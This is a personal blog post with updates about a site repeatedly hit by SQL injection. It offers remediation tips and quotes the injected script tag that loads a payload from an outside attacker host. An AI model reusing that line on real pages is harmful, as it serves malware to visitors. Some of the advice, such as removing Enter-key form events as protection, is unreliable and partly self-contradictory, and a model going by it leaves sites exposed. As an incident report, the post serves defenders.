Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I’m apt to say when I do a beat down, FUACATA.

Bye bye sql injection hacker.

Ok, the latest state of sql injection attacks have been a nightmare. We got hacked again, but this time, with a insertion at the url level. These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the text file here.

So look through your server logs for this code in the url with a GET statement. Have your coder or web programmer disallow all all of the elements being used in the statement.

I’ve been getting a lot of requests for information about how to patch this attack.  I’ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only “attempts” to find a vulnerability.

So I did some more research, and had a talk with Jess Coburn with Windows Hosting company Appliedi.net.  Although the attack seems like a Window vulnerability, because of the attempts to gain entry through typical Windows Vulnerabilities, it’s not.  The media file attempts where only PART of the attempts made.  Apparently this attack is either preempted or followed up by various attempts to gain entry.  On our site, it was not a sql injection in the url, but a search form where we had created that uses what’s called an “Enter Event.”  Quickly, most asp.net search forms eschew keyboard events in favor of click events that call javascript postbacks.  Meaning that if you have an asp.net search control on your website, a person has to click the search button instead of just hitting Enter.

Here lies the problem.  User’s hate hitting search buttons, but love hitting their enter key.  Enter events are easy to create programmatically, thus so many forums and blogs get spammed and hacked all of the time.  However, javascript postback’s, not so much.   So far, from the little I do know, it’s very difficult to program into a hack scan a postback because it does not do a post or get the way most sites do.

But back to the problem and some solutions.

1. Disallow all sql parameters in your form text fields.  There are plenty of tutorials on how to do this.
2. Read Jess’s blog, he has a TON of links to great source and a neat rollback sql function to fix these type of sql injections
3. Remove “Enter Events” from your asp and asp.net forms.  Your users are going to have to click on the button for now.
4. Did I mention go to Jess’s blog?
5. Check for your most recent database backup.  If the offending script does not appear, you’ll have clean code and timestamp as to when the last time your code was clean.
6. If you don’t do regular backups, start to get into the habit right NOW.  If you have to do a backup every 2 hours, then do it.  Keep copies online and off.  A reputable hosting company will allow you to make as many backups as you need.
7. Check your hosting company’s backup policy.  Appliedi.net backups data at least twice in a 24 hour period.
8. If you’re on a dedicated box, assign some space and memory to run sql backup jobs automatically.  I’m doing some research on best practices.
9. During the hack attempt, or event, have a BIG GLASS OF SCOTCH, RUM, OR LIQUOR OF YOUR OWN CHOOSING.  These things are not easy to get through, but you need to relax or you’ll never get through it.
10. Be better prepared.  Just like a hurricane or earthquake, have a disaster plan.

Hope this helps.

Updated from: The xiaobaishan bomb.

Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We where hacked againg, this the script calling:

<script src=http://flyzhu.9966.org/us/Help.asp></script>

Tricky little fucker.

In fact, this hack is pretty well thought out. Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds. What happened?

This is a Windows vulnerability. What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder. They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.

UPDATE: I’ve got new info on this. It’s a pure sql injection hack.

Sneaky fucker.

Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn’t run it against our VPS yet.

UPDATE:  Yes they did.  Whoopsee.

So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.

Right now, there is a reported 10,000 sites affected by this hack.